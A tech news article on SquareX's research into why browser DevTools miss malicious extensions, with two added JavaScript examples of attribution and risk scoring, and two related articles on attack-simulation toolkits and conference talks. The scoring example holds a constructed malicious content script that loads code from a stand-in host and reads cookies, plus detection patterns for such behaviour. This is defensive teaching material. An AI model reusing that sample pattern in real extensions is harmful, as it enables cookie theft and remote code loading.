
Browser DevTools' gaps leave millions exposed to threats
Techday NZ, 29-07-2025
SquareX has highlighted architectural limitations in browser developer tools that hinder the effective debugging and analysis of potentially malicious browser extensions. According to researchers at SquareX, browser extensions have become ubiquitous tools in both enterprise and consumer environments. However, organisations often rely on trust signals provided by browser extension stores, such as "Verified" or "Chrome Featured" badges, which may not provide genuine assurances about security. The Geco Colourpick case, where 18 malicious extensions distributed spyware to approximately 2.3 million users despite carrying verified statuses, was cited as an example.
SquareX security research has identified a key technological issue that complicates extension analysis. Nishant Sharma, Head of Security Research at SquareX, commented: "Aside from the fact that thousands of extension updates and submissions are being made daily, it is simply impossible for browser vendors to monitor and assess an extension's security posture at runtime. This is because existing DevTools were designed to inspect web pages. Extensions are complex beasts that can behave dynamically, work across multiple tabs and have 'superpowers' that allow them to easily bypass detection via rudimentary Browser DevTool telemetry."
Sharma added, "In other words, even if browser vendors were not inundated by the sheer quantity of extension submission requests, the architectural limitations of Browser DevTools today would still allow numerous malicious extensions to pass DevTool based security inspections."
Background to browser DevTools
The current generation of browser developer tools originated in the late 2000s. At that time, they were intended to assist developers and users in debugging websites and inspecting web page elements. Since then, browser extensions have evolved to offer unique capabilities, such as the ability to modify web pages, take screenshots, and inject scripts across multiple sites. These advanced functions cannot be readily tracked or attributed using today's DevTools.
For example, SquareX notes that when an extension injects a script into a page to execute a network request, existing DevTools cannot determine whether the request originated from the web page itself or from the extension. This lack of distinction makes the detection of malicious behaviour more difficult.
Proposed approach
To address these limitations, SquareX researchers have proposed an alternative framework. Detailed in a recent technical blog, the suggested approach combines a modified browser with AI-driven agents. The modified browser would be engineered to expose telemetry critical to understanding the behaviour of extensions. Meanwhile, the Browser AI Agent would simulate different user profiles to trigger various extension actions during runtime. This enables security teams to perform dynamic analysis and uncover behaviours only activated under certain user actions, timed events, or specific device environments.
This method is termed the Extension Monitoring Sandbox. According to SquareX, the necessary browser modifications and AI-driven simulation strategies outlined in their research are capable of uncovering "hidden" extension activities that would otherwise remain undetected by traditional developer tools.
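The attribution gap described above, and the sandbox idea of running an extension under several simulated user profiles, can be made concrete with a small model. The following is an added example written for this article, not SquareX's code or telemetry format: the record fields (`page`, `initiator`, `ext`, `profile`), the profile names and the destinations are all constructed assumptions. It shows that a page-scoped record carries nothing that names the extension, so a page script and an extension-injected script produce identical attribution, and that telemetry stamped with the originating extension and the profile it was observed under lets a reviewer pick out behaviour that only fires for some users.

```javascript
// Added example (not SquareX code). All records and field names are constructed.

// What a page-scoped DevTools-style network log sees: an injected script runs in
// the page's JavaScript world, so its requests look like the page's own.
const pageScopedRecords = [
  { page: "https://mail.example.test/inbox", url: "https://mail.example.test/api/sync", initiator: "script" },
  { page: "https://mail.example.test/inbox", url: "https://collector.invalid/beacon", initiator: "script" },
];

// Page-level attribution: no field names an extension, so both records get the same label.
function attributeFromPageTelemetry(rec) {
  return { url: rec.url, origin: rec.initiator === "script" ? "page-or-injected-script" : "unknown" };
}

// Assumed sandbox schema: the modified browser stamps each request with the extension
// that caused it (null = the page itself) and the simulated profile it ran under.
const PROFILES = ["default", "finance-user", "admin"];
const sandboxRecords = [
  { profile: "default",      ext: null,                url: "https://mail.example.test/api/sync" },
  { profile: "default",      ext: "ext-colour-picker", url: "https://collector.invalid/beacon" },
  { profile: "finance-user", ext: null,                url: "https://mail.example.test/api/sync" },
  { profile: "finance-user", ext: "ext-colour-picker", url: "https://collector.invalid/beacon" },
  { profile: "finance-user", ext: "ext-pdf-helper",    url: "https://collector.invalid/upload" },
  { profile: "admin",        ext: null,                url: "https://mail.example.test/api/sync" },
  { profile: "admin",        ext: "ext-colour-picker", url: "https://collector.invalid/beacon" },
];

// Sandbox attribution: the stamp answers "page or which extension?" directly.
function attributeFromSandboxTelemetry(rec) {
  return { url: rec.url, origin: rec.ext === null ? "page" : rec.ext };
}

// Group each extension's destination hosts with the set of profiles they were seen under.
function behavioursByExtension(records) {
  const out = new Map();
  for (const r of records) {
    if (r.ext === null) continue;
    if (!out.has(r.ext)) out.set(r.ext, new Map());
    const dests = out.get(r.ext);
    const host = new URL(r.url).host;
    if (!dests.has(host)) dests.set(host, new Set());
    dests.get(host).add(r.profile);
  }
  return out;
}

// A destination that only appears under some profiles is behaviour a single
// run would have missed; report it with the profiles it was and was not seen in.
function hiddenBehaviours(records, profiles) {
  const findings = [];
  for (const [ext, dests] of behavioursByExtension(records)) {
    for (const [host, seen] of dests) {
      const missingIn = profiles.filter((p) => !seen.has(p));
      if (missingIn.length > 0) {
        findings.push({ ext, host, seenIn: [...seen].sort(), missingIn });
      }
    }
  }
  return findings;
}

// Usage: the page-scoped view cannot separate the two records; the sandbox view can,
// and the profile sweep surfaces the PDF helper's upload that only fires for finance users.
console.log(attributeFromPageTelemetry(pageScopedRecords[1]));
console.log(attributeFromSandboxTelemetry(sandboxRecords[4]));
console.log(hiddenBehaviours(sandboxRecords, PROFILES));
```

The profile sweep is deliberately naive: it treats "not observed in every profile" as worth a look, which also flags legitimate per-user features, so in practice it is a triage signal to be read alongside the extension's declared purpose rather than a verdict.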
Enterprise risk
SquareX suggests that this architectural gap in browser DevTools has contributed to millions of users being exposed to threats. As browser extensions play an increasingly important role in enterprise operations, the company is urging security teams to go beyond reliance on labels or store badges when assessing risk. The revelation of Browser DevTools' architectural limitations exposes a fundamental security gap that has led to millions of users being compromised. As browser extensions become a core part of the enterprise workflow, it is critical for enterprises to move from superficial labels to solutions specifically designed to tackle extension security. It is absolutely critical for browser vendors, enterprises and security vendors to work closely together in tackling what has become one of the fastest emerging threat vectors.
Audit offering
SquareX is offering a complimentary enterprise-wide extension audit for organisations. The audit leverages all three components of the SquareX Extension Analysis Framework - metadata analysis, static code analysis, and dynamic analysis using the Extension Monitoring Sandbox. This process delivers a comprehensive review of all browser extensions in use across an organisation and provides a risk score for each.
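To illustrate how the three stages named above fit together, here is an added example of a toy review pipeline. It is not SquareX's Extension Analysis Framework and does not reproduce its scoring; the permission weights, static patterns, risk bands and the sample extension (manifest, content script and runtime events) are all constructed for illustration. The point it makes is that each stage catches something the others cannot: the manifest shows the extension's reach, the static scan shows what the shipped code does, and only the dynamic stage sees a host contacted by code that was fetched remotely at runtime and is therefore absent from the package.

```javascript
// Added example (not SquareX code). Weights, patterns and samples are constructed.

// Stage 1: metadata. Broad host access and script injection weigh more than storage.
// Permissions not listed here get a default weight of 1.
const PERMISSION_WEIGHTS = { "<all_urls>": 3, scripting: 2, cookies: 2, webRequest: 2, tabs: 1, storage: 0 };

function metadataFindings(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return perms
    .map((p) => ({ stage: "metadata", name: p, weight: PERMISSION_WEIGHTS[p] ?? 1 }))
    .filter((f) => f.weight > 0);
}

// Stage 2: static scan of the packaged script for patterns that deserve a closer look.
const STATIC_PATTERNS = [
  { name: "remote-script-load", re: /createElement\(\s*['"]script['"]\s*\)/, weight: 2 },
  { name: "dynamic-code-eval", re: /\beval\(|new Function\(/, weight: 2 },
  { name: "cookie-access", re: /document\.cookie/, weight: 2 },
];

function staticFindings(src) {
  return STATIC_PATTERNS.filter((p) => p.re.test(src)).map((p) => ({ stage: "static", name: p.name, weight: p.weight }));
}

// Stage 3: dynamic. Hosts contacted during a sandbox run that appear nowhere in the
// packaged code. Code loaded remotely at runtime is invisible to the static stage,
// so this is where its outbound traffic shows up.
function dynamicFindings(events, src) {
  const packagedHosts = new Set([...src.matchAll(/https?:\/\/([^/'"\s]+)/g)].map((m) => m[1]));
  return events
    .filter((e) => e.type === "network" && !packagedHosts.has(new URL(e.url).host))
    .map((e) => ({ stage: "dynamic", name: `unreferenced-host:${new URL(e.url).host}`, weight: 3 }));
}

// Combine the three stages into one score and a coarse band (constructed thresholds).
function riskScore(manifest, src, events) {
  const findings = [...metadataFindings(manifest), ...staticFindings(src), ...dynamicFindings(events, src)];
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const level = score >= 8 ? "high" : score >= 4 ? "medium" : "low";
  return { score, level, findings };
}

// Constructed sample: a colour-picker-style extension with wide reach whose content
// script pulls a remote script and reads cookies.
const sampleManifest = {
  manifest_version: 3,
  name: "Colour Picker (constructed sample)",
  permissions: ["tabs", "scripting", "storage"],
  host_permissions: ["<all_urls>"],
};
const sampleContentJs = `
  // constructed content script: loads remote code into the page and reads cookies
  const s = document.createElement('script');
  s.src = 'https://cdn.invalid/x.js';
  document.head.appendChild(s);
  const c = document.cookie;
`;
// Constructed sandbox events: the remotely loaded script talks to a host the package never names.
const sampleEvents = [
  { type: "network", url: "https://cdn.invalid/x.js" },
  { type: "network", url: "https://drop.invalid/collect" },
];

// Constructed benign baseline for comparison: storage only, no injected or remote code.
const benignManifest = { manifest_version: 3, name: "Theme Saver (constructed sample)", permissions: ["storage"] };
const benignJs = "chrome.storage.local.get('theme', applyTheme);";

console.log(riskScore(sampleManifest, sampleContentJs, sampleEvents));
console.log(riskScore(benignManifest, benignJs, []));
```

Run under Node, the sample scores 13 ("high": three permission findings, two static hits and the unreferenced host), while the baseline scores 0. The scoring is intentionally simple; the structure, where the dynamic stage is the only one that can see traffic from remotely loaded code, is the part worth keeping.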
The company cites reference material available through public security news sources regarding the prevalence and risk posed by malicious extensions. SquareX continues to promote the need for collaboration between browser vendors, security providers, and enterprises in addressing extension security challenges.

Related Articles


Techday NZ, 2 days ago
SquareX launches open-source toolkits to defend browsers
SquareX has released two open-source toolkits to support security teams in simulating and defending against browser-based attacks that can evade traditional enterprise security measures. The two new toolkits, developed by SquareX security researchers, are designed to enable red and blue teams to more effectively address attack techniques that specifically target web browsers. These methods often exploit the fact that many conventional network and endpoint security solutions have limited visibility into threats that operate solely within the browser environment, such as session hijacking and data exfiltration.
The prevalence of web browsers as the interface through which corporate resources are accessed and sensitive data is managed has elevated the browser as a key attack vector for threat actors. Despite this, most existing security frameworks continue to focus on more traditional points of compromise, like endpoints and networks. The toolkits aim to bridge this gap by providing practical resources for offensive (red teams) and defensive (blue teams) security teams. Red teams can leverage the tools to create simulations of browser-based attacks, while blue teams can use them to learn to detect and respond to threats that might be otherwise overlooked by standard monitoring systems.
Angry Magpie toolkit
One of the new toolkits, Angry Magpie, was developed by SquareX researchers Jeswin Mathai, Pankaj Sharma and Xian Xiang Chang. It focuses on simulating data exfiltration attacks using data splicing techniques that target weaknesses in data loss prevention (DLP) systems. Angry Magpie demonstrates how attackers can employ data sharding, ciphering, transcoding, and smuggling to bypass both proxy-based and endpoint DLP solutions. These attacks can be executed through everyday browser operations such as copying to clipboard, file uploads, downloads, and printing.
This approach sheds light on how insider threats might launch data exfiltration campaigns from within a browser, offering security teams a means to recognise and counter similar techniques. The toolkit provides methods to reveal these vulnerabilities and can help teams develop targeted defences.
Copycat toolkit
The second toolkit, Copycat, was created by SquareX security researchers Dakshitaa Babu, Tejeswar S Reddy, Pankaj Sharma and Albin Antony. Copycat is designed to simulate identity and authentication attacks that are initiated through malicious or compromised browser extensions. The toolkit contains ten modules, each illustrating a distinct technique for carrying out identity compromise at the browser level, such as silent account hijacking, credential theft, two-factor authentication interception, and manipulation of OAuth flows. The toolkit demonstrates how even browser extensions with minimal permissions - such as widely-used colour picker extensions with tabs and scripting access - can be used by attackers to compromise user identities and gain control over authenticated sessions. Recent campaigns by threat actor groups like Scattered Spider and Muddled Libra have utilised similar browser-based techniques as an entry point into enterprises.
"Enterprise security solutions are struggling to keep pace with modern attack techniques that operate entirely within web browsers. While organizations have invested heavily in endpoint detection and network security, these traditional defenses have limited visibility into browser-based threats - particularly identity attacks and data exfiltration that occur within authenticated sessions."
The release of Angry Magpie and Copycat toolkits highlights the need for enhanced collective understanding and preparedness. They intend to give security professionals both concrete attack examples and the detection mechanisms necessary for enterprise environments.
This effort is part of SquareX's broader strategy, which previously saw the introduction of a browser detection and response solution designed to deliver visibility and control within browser sessions. The company's security researchers emphasise that providing these tools to the wider community can help teams stay informed about the latest attack vectors and develop appropriate strategies in response.
"Through these toolkits, SquareX extends its impact beyond pioneering the Browser Detection and Response solution to enabling the entire security industry - ensuring teams understand actively exploited attack techniques and can build appropriate defenses."
The toolkits are open-source and available to security teams for direct use and adaptation in enterprise environments. Live demonstrations of Angry Magpie and Copycat are being held at DEF CON, offering a practical showcase of how the tools can be integrated into existing security frameworks.


Techday NZ, 5 days ago
SquareX to unveil browser, passkey flaws at Black Hat, DEF CON
SquareX researchers are set to present a series of vulnerability disclosures relating to browser security at two major security events in August. During Black Hat USA and DEF CON 33, SquareX will reveal a number of architectural vulnerabilities impacting passkey authentication systems, enterprise data loss prevention solutions, and browser extensions. The company's researchers plan to deliver multiple talks that aim to detail new techniques attackers may use to circumvent existing security measures.
Browser-first world
At Black Hat USA, the presentation titled "Browser-Native Security in a Browser First World" will be delivered by Vivek Ramachandran, Founder of SquareX. This talk is expected to cover the growing dependency enterprises have on web browsers and the resulting security challenges. With staff reportedly spending up to 80% of their device usage time within browsers, defending against browser-based threats has become a critical concern. Ramachandran's talk will highlight current tactics, techniques, and procedures (TTPs) that enable attackers to bypass technologies such as Secure Access Service Edge (SASE), endpoint detection and response (EDR), and endpoint data loss prevention (DLP) tools.
Passkey vulnerabilities
DEF CON 33 will feature Shourya Pratap Singh, Jonathan Lin and Daniel Seetoh presenting research under the session title "Passkeys Pwned: Turning WebAuthn Against Itself." This discussion will focus on a new technique designed to subvert passkey authentication. Passkeys, which have seen significant uptake among major technology providers such as Apple, Google, and Microsoft, are promoted as a more secure alternative to traditional passwords. Despite this positioning, SquareX's research asserts that vulnerabilities still exist.
"Over the past year, we have been releasing bleeding edge research on architectural browser vulnerabilities as part of the Year of Browser Bugs project. We believe that deeply understanding the attacker mindset is the only way to defend against the newest threat vectors, and we believe that it is critical to share these findings at industry leading conferences like Black Hat and DEF CON. This year's research demonstrates critical gaps that traditional security solutions simply cannot address - everything from passkey to browser extension vulnerabilities. We will also be sharing multiple open source browser-native security tools that enterprises need to plug the browser security gap," said Vivek Ramachandran, Founder of SquareX.
Browser extension threats
In addition to the mainstage talks, Nishant Sharma and Shourya Pratap Singh will present "Plug and Prey: Scanning and Scoring Browser Extensions" at Recon Village. Their session introduces ExtHuntr, an open-source tool developed to scan for installed browser extensions, analyse their permissions and behaviour, and generate risk scores. ExtHuntr aims to provide security teams with greater visibility into potential risks posed by browser extensions. SquareX will also run a demonstration called "Copycat: Identity Stealer Extension" and a session titled "Angry Magpie: DLP Bypass Simulator" at DEF CON 33 Demo Labs, underscoring the firm's focus on practical, real-world attack simulation tools related to browser security.
Cloud security workshop
Nishant Sharma, Head of Security Research at SquareX, is scheduled to conduct a workshop at Cloud Village, titled "Serverless but Not Defenceless: A Security Deep Dive into Cloud Run." The workshop will provide attendees with detailed guidance on how to deploy and manage services on Google Cloud Run securely, using principles drawn from DevSecOps and related practices.
Security field manual
Audrey Adeline, a SquareX researcher, will participate in "The Trailblazer's Guide to Cybersecurity" discussion at Black Hat USA. Topics will include the experiences of professionals who are first-generation entrants to the cybersecurity sector. Adeline will also share information about the release of The Browser Security Field Manual, a book written in collaboration with chief information security officers (CISOs) from Fortune 500 companies and major technology firms. The manual addresses contemporary attacks targeting employees via browsers and provides guidance on defensive techniques.
Event schedule
In addition to the headline talks, SquareX researchers will lead several demonstration sessions and workshops at both Black Hat USA and DEF CON 33. These include practical labs showing browser-based identity theft and DLP bypass scenarios, as well as further engagements focusing on serverless security and browser-native security tools. The presentations are designed to highlight what SquareX claims are critical gaps in existing security technology, particularly where traditional solutions may not adequately address emerging attack vectors related to browsers, passkeys, and extensions.